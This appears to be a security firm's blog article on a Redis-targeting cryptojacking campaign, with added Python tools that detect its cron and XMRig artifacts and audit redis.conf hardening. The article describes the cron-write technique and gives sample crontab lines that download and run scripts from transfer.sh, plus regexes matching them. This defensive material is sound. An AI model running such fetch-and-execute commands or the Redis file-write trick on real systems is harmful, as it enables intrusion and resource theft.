
Novel Cryptojacking Campaign Leverages Misconfigured Redis Database Servers

Databases are an indispensable part of modern applications. Whether the front end is a web app or a customer-facing mobile app, the database server stores the customer data the app retrieves on demand. Maximize Market Research predicts that the NoSQL database market will reach US$36.50 billion by 2029. Redis is a prominent open-source, in-memory NoSQL data store; it is widely deployed on AWS, where it has been reported to hold a 28 percent market share.

Because of this widespread use, Redis has caught the attention of attackers, who are running cryptojacking campaigns against misconfigured Redis deployments. This article discusses how misconfigured Redis servers became the target of a novel cryptojacking campaign, and highlights the preventive measures enterprises can take to protect their Redis deployments.

What is the Redis Database?

Redis (Remote Dictionary Server) is an open-source, in-memory NoSQL data store. It stores data as key-value pairs, much like a HashMap in Java. It is released under a BSD license and is used as a database, cache, message broker, and streaming engine.

Redis executes atomic operations on a range of data structures, including strings, hashes, lists, sets, HyperLogLogs, and bitmaps.

Cryptojacking Campaigns Performed Using Misconfigured Redis Databases

Cado Labs security researchers recently discovered a novel cryptojacking campaign that targets insecure, misconfigured Redis deployments. The attackers leverage transfer.sh, a legitimate open-source command-line file-transfer service, to stage and deliver their payloads.

Cado Labs says, "Underpinning this campaign was the use of Transfer.sh. It may be an attempt at evading detections based on other common code hosting domains (such as pastebin[.]com)." The cloud security firm also stressed, "The command line interactivity of Transfer.sh makes it a perfect candidate for hosting & delivery of malicious payloads."

In this attack chain, the attacker connects to an exposed Redis instance that requires no authentication and uses it to write a cron job on the host (the long-standing technique is to point Redis's persistence directory and dump filename at the cron spool and then save a key whose value is a crontab line). When the cron scheduler parses that entry, the attacker's commands run as arbitrary code. The job is written so that it retrieves a payload hosted on Transfer.sh.

Security researchers have identified similar attack mechanisms in cryptojacking operations by threat groups such as WatchDog and TeamTNT. The pattern is identical across these campaigns: after gaining initial access, the attackers run a script as the first-stage payload, which in turn installs an XMRig cryptocurrency miner.

The script retrieves the payload from a location such as https://transfer[.]sh/QQcudu/tmp[.]fDGJW8BfMC. The downloaded file is saved as .cmd and executed with bash. A custom XMRig configuration is then written to disk, which registers the miner with the following mining pools:

  • xmr.pool.gntl.co.uk

  • pool.hashvault.pro

  • xmr-eu1.nanopool.org

  • monerohash.com

  • pool.supportxmr.com

  • ca.monero.herominers.com

  • xmrpool.eu

  • pool.xmrfast.com

  • pool.xmr.pt
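The two host artifacts the campaign leaves behind, a cron entry that pulls from transfer.sh and an XMRig config pointing at the pools listed above, are easy to sweep for on suspect Linux hosts. The following is an added example written for this article, not Cado Labs' or Packetlabs' code: the crontab text and the XMRig config.json it inspects are constructed samples (the transfer.sh paths in them are placeholders), and only the pool hostnames come from the list above.

```python
"""Flag the Redis-cron-to-XMRig pattern described above in host artifacts.

Added example, not Cado Labs' or Packetlabs' code. The crontab text and the
XMRig config below are constructed samples; only the pool hostnames are
taken from the article's list.
"""
import json
import re

# Mining pools listed in the article's XMRig configuration.
KNOWN_POOLS = {
    "xmr.pool.gntl.co.uk", "pool.hashvault.pro", "xmr-eu1.nanopool.org",
    "monerohash.com", "pool.supportxmr.com", "ca.monero.herominers.com",
    "xmrpool.eu", "pool.xmrfast.com", "pool.xmr.pt",
}

# A fetch from transfer.sh by curl or wget ...
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*transfer\.sh/", re.IGNORECASE)
# ... whose output is piped straight into a shell, or staged in a file
# (the campaign used a file named ".cmd") that is then run with sh/bash.
EXEC_RE = re.compile(r"\|\s*(?:ba)?sh\b|\b(?:ba)?sh\s+\S*\.cmd\b", re.IGNORECASE)


def suspicious_cron_lines(crontab_text):
    """Return [(line_no, line)] for entries that fetch from transfer.sh
    and execute the result. Comment lines are skipped."""
    hits = []
    for line_no, line in enumerate(crontab_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        if FETCH_RE.search(line) and EXEC_RE.search(line):
            hits.append((line_no, line.strip()))
    return hits


def pool_hosts(xmrig_config_text):
    """Return the set of pool hostnames an XMRig config.json connects to.
    XMRig lists pools as {"pools": [{"url": "host:port" or "scheme://host:port"}]}."""
    config = json.loads(xmrig_config_text)
    hosts = set()
    for pool in config.get("pools", []):
        url = pool.get("url", "")
        host = url.rsplit("://", 1)[-1].split(":", 1)[0].lower()
        if host:
            hosts.add(host)
    return hosts


def known_pool_matches(xmrig_config_text):
    """Pool hosts in the config that appear in the article's pool list."""
    return pool_hosts(xmrig_config_text) & KNOWN_POOLS


# Constructed sample artifacts (not recovered from the campaign):
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL https://transfer.sh/EXAMPLE/tmp.payload -o /tmp/.cmd && bash /tmp/.cmd
* * * * * wget -q -O- https://transfer.sh/EXAMPLE2/x | sh
"""

SAMPLE_XMRIG_CONFIG = json.dumps({
    "autosave": True,
    "pools": [
        {"url": "pool.supportxmr.com:443", "user": "WALLET", "tls": True},
        {"url": "stratum+tcp://xmr-eu1.nanopool.org:14433", "user": "WALLET"},
        {"url": "pool.example.invalid:3333", "user": "WALLET"},
    ],
})

if __name__ == "__main__":
    for line_no, line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"cron line {line_no}: {line}")
    print("known pools:", sorted(known_pool_matches(SAMPLE_XMRIG_CONFIG)))
```

On a real host, feed `suspicious_cron_lines` the contents of /etc/crontab, /etc/cron.d/* and each user's spool file, and `pool_hosts` any config.json found next to an unexplained binary; an unknown pool is still worth a look, so the unfiltered `pool_hosts` result is returned separately from the matches against the article's list.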

Redis Database Server Attack Reports

Although the campaign's goal is clearly to hijack system resources for mining cryptocurrency, an infection can have unintended side effects. The malware's careless changes to Linux memory-management settings could easily corrupt data or take the host offline.

In recent months, security researchers have seen Redis servers hit by a series of threats, following the Redigo (Go-based Redis malware) and HeadCrab (an elusive Redis-targeting threat) incidents.

Cado Security also highlighted, "As mentioned previously, the script retrieves the pnscan mass network scanning utility. This utility is often used for finding vulnerable Redis servers and propagating a copy of the script to them. This technique has been previously attributed to WatchDog. It uses an interesting combination of the Linux 'seq' and 'sort' commands to build up a list of IP addresses to target."

Preventive Measures Against Redis Database Server Attacks

  • Do not expose Redis to the internet. Require authentication (requirepass, or ACL users on Redis 6 and later) so that an instance that is reachable cannot be used straight away.

  • Avoid storing sensitive data in Redis where possible. Data held in plaintext is exposed to theft, so encrypt sensitive values before writing them, and protect data in transit: Redis offers optional TLS support on multiple communication channels (client connections, replication, and the cluster bus).

  • Monitor Redis hosts for signs of infection. Unexpected CPU and memory consumption, new cron entries, and outbound connections to mining pools are the indicators that a crypto-mining payload has landed.

  • Run Redis with minimum privileges, under a dedicated unprivileged account. This limits the damage a compromised instance can do, for example by writing files into system directories such as the cron spool.

  • Run a current Redis release with "protected mode" left on (it has been available since Redis 3.2). Protected mode refuses connections from non-loopback clients when no password is configured.

  • Disable or rename commands that are not required, in particular CONFIG (rename-command CONFIG "" in redis.conf, or ACL rules on Redis 6 and later). CONFIG SET is what allows an attacker to redirect Redis's persistence output to an arbitrary path, so removing it closes off the cron-job technique.
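The recommendations above translate into a handful of redis.conf directives that can be checked mechanically. The following is an added example for this article, not the Redis project's code or Packetlabs' tooling: it parses a redis.conf body and reports which of the hardening points above are missing. Both config texts are constructed samples, and the check on `enable-protected-configs` (a Redis 7 directive that blocks CONFIG SET of dir and dbfilename by default) is my addition rather than something the article lists.

```python
"""Audit a redis.conf against the hardening advice above.

Added example, not the Redis project's or the article's code. Both config
texts are constructed. The checks follow the article's list; the
enable-protected-configs check (a Redis 7 directive) is my addition.
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
WILDCARD = {"*", "0.0.0.0", "::", "::*"}


def parse_redis_conf(text):
    """Return {directive: [[arg, ...], ...]}. Directives such as
    rename-command may repeat, so each maps to a list of argument lists."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    conf = parse_redis_conf(text)
    findings = []

    def first(name, default):
        vals = conf.get(name)
        return vals[0][0].lower() if vals and vals[0] else default

    # 1. Exposure: no bind line, or a wildcard address, listens on all interfaces.
    #    Redis 7 allows "-"-prefixed optional addresses (e.g. -::1), hence lstrip.
    bind = [v.lstrip("-") for args in conf.get("bind", []) for v in args]
    if not bind or any(v in WILDCARD for v in bind):
        findings.append("bind: listening on all interfaces")
    elif any(v not in LOOPBACK for v in bind):
        findings.append("bind: non-loopback address; verify it is not internet-reachable")

    # 2. Protected mode refuses non-loopback clients when no password is set.
    if first("protected-mode", "yes") == "no":
        findings.append("protected-mode no")

    # 3. Authentication: requirepass, or an ACL user carrying a password
    #    (">plaintext" or "#sha256" tokens on a "user" line).
    acl_users = conf.get("user", [])
    acl_has_password = any(t.startswith((">", "#")) for args in acl_users for t in args)
    if "requirepass" not in conf and not acl_has_password:
        findings.append("no authentication (requirepass or ACL password)")

    # 4. CONFIG SET dir/dbfilename is the file-write primitive behind the cron
    #    technique; rename it away, or deny it to every ACL user.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    acl_denies_config = any(t.lower() in ("-@dangerous", "-@all", "-config")
                            for args in acl_users for t in args)
    if "CONFIG" not in renamed and not acl_denies_config:
        findings.append("CONFIG command reachable")

    # 5. Redis 7 refuses CONFIG SET of dir/dbfilename unless this is re-enabled.
    if first("enable-protected-configs", "no") == "yes":
        findings.append("enable-protected-configs yes")

    # 6. Transport encryption (Redis 6+): a TLS port, and no plaintext port beside it.
    if "tls-port" not in conf:
        findings.append("no tls-port: client traffic is plaintext")
    elif first("port", "6379") != "0":
        findings.append("tls-port set but plaintext port still open (set port 0)")

    return findings


# Constructed: the kind of deployment this campaign looks for.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: the same server after applying the list above.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 0
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
enable-protected-configs no
tls-port 6380
tls-cert-file /etc/redis/tls/redis.crt
tls-key-file /etc/redis/tls/redis.key
tls-ca-cert-file /etc/redis/tls/ca.crt
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["no findings"])
```

The weak sample is exactly what the campaign needs: reachable on every interface, protected mode off, no password, and CONFIG available to rewrite dir and dbfilename. The hardened sample binds to loopback, requires a password, removes CONFIG and FLUSHALL, and moves clients to TLS only. On a running instance the same directives can be read back with `CONFIG GET` (while it still exists) and compared against the file, since an attacker who has already used CONFIG SET will have changed the live values without touching redis.conf.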

Conclusion 

Redis is a robust NoSQL data store for managing complex semi-structured and unstructured data. As its use grows, enterprises must revisit the security posture of their Redis deployments. Those without the in-house capacity can seek guidance from cybersecurity firms on protecting Redis against attacks that exploit misconfiguration.

Ready to take your organization's cybersecurity to the next level? Contact our team of ethical hackers today to uncover hard-to-find vulnerabilities via our 95% manual pentesting methodology.
